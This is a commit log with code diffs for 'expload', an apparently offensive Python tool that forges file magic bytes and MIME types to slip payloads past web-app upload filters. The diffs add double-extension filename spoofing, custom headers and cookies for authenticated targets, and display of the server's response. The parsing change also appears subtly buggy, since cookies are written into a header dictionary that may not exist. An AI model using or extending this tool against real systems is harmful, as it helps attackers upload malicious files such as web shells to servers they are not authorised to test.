Update README.md

Update parse.py
Update expload.py
2024-09-24 20:36:02 +01:00 · 2024-09-24 20:34:54 +01:00 · 2024-09-24 20:34:36 +01:00
3 changed files with 23 additions and 4 deletions
--- a/README.md
+++ b/README.md
@ -6,7 +6,7 @@ A tool for injecting magic bytes of allowed files, and spoofing the mime type. I

 ## useage
 ```
-expload.py [-h] -u URL -p PAYLOAD -e EXT -n NAME -f FILENAME
+expload.py [-h] -u URL -p PAYLOAD -e EXT -n NAME -f FILENAME [-d] [-h2] [-he HEADERS [HEADERS ...]] [-c COOKIES] [-r]

 expload args

@ -19,4 +19,11 @@ options:
  -n NAME, --name NAME  field name for file upload
  -f FILENAME, --filename FILENAME
                        file name to upload with
+  -d, --doubleextend    spoofed extension inserted into filename
+  -h2, --http2          use http2 if supported
+  -he HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
+                        headers and keys colon seperated
+  -c COOKIES, --cookies COOKIES
+                        cookies seperated by ; and wrapped in quotes
+  -r, --response        display the response from the target webapp
 ```
--- a/expload.py
+++ b/expload.py
@ -14,7 +14,7 @@ def grabsig(ext):
 def fileupload():
    ext=args.ext
    name=args.name
-    filename=args.filename
+    filename=args.filename if not args.doubleextend else ".".join(args.filename.split(".")[0:-1])+f".{args.ext}."+args.filename.split(".")[-1]
    with open(args.payload,"r") as payload:
        content=payload.read().encode("utf-8")
    with tempfile.NamedTemporaryFile() as tmp:
@ -31,7 +31,7 @@ def fileupload():
        with httpx.Client(http2=args.http2) as client:

            try:
-                r = client.post(args.url, files=files)
+                r = client.post(args.url, files=files, headers=args.headers)

            except httpx.ReadTimeout:
                print("Error: Response timed out but file may have been uploaded")
@ -46,6 +46,8 @@ def fileupload():
                exit()

        print("file posted")
+        if args.response:      
+            print(r.text)

 if __name__ == "__main__":
    args=exploadlib.parse.parser()
--- a/exploadlib/parse.py
+++ b/exploadlib/parse.py
@ -6,7 +6,17 @@ def parser():
 	parser.add_argument("-e", "--ext",required=True,help="extension to spoof")
 	parser.add_argument("-n", "--name",required=True,help="field name for file upload")
 	parser.add_argument("-f", "--filename",required=True,help="file name to upload with")
+	parser.add_argument("-d", "--doubleextend",action="store_true",help="spoofed extension inserted into filename")
 	parser.add_argument("-h2", "--http2",action="store_true",help="use http2 if supported")
+	parser.add_argument("-he", "--headers",help="headers and keys colon seperated",nargs="+")
+	parser.add_argument("-c", "--cookies",help="cookies seperated by ; and wrapped in quotes")
+	parser.add_argument("-r", "--response",action="store_true",help="display the response from the target webapp")
+	

 	args = parser.parse_args()
+	if args.headers:
+		args.headers={header.split(":")[0]:header.split(":")[1] for header in args.headers}
+	if args.cookies:
+            args.headers["cookie"]=args.cookies
+
 	return args
Author	SHA1	Message	Date
witchdocsec	e827a58aa5	Update README.md	2024-09-24 20:36:02 +01:00
witchdocsec	06c11b96b6	Update parse.py	2024-09-24 20:34:54 +01:00
witchdocsec	6bab1015a7	Update expload.py added double extension method and the ability to pass cookies and headers	2024-09-24 20:34:36 +01:00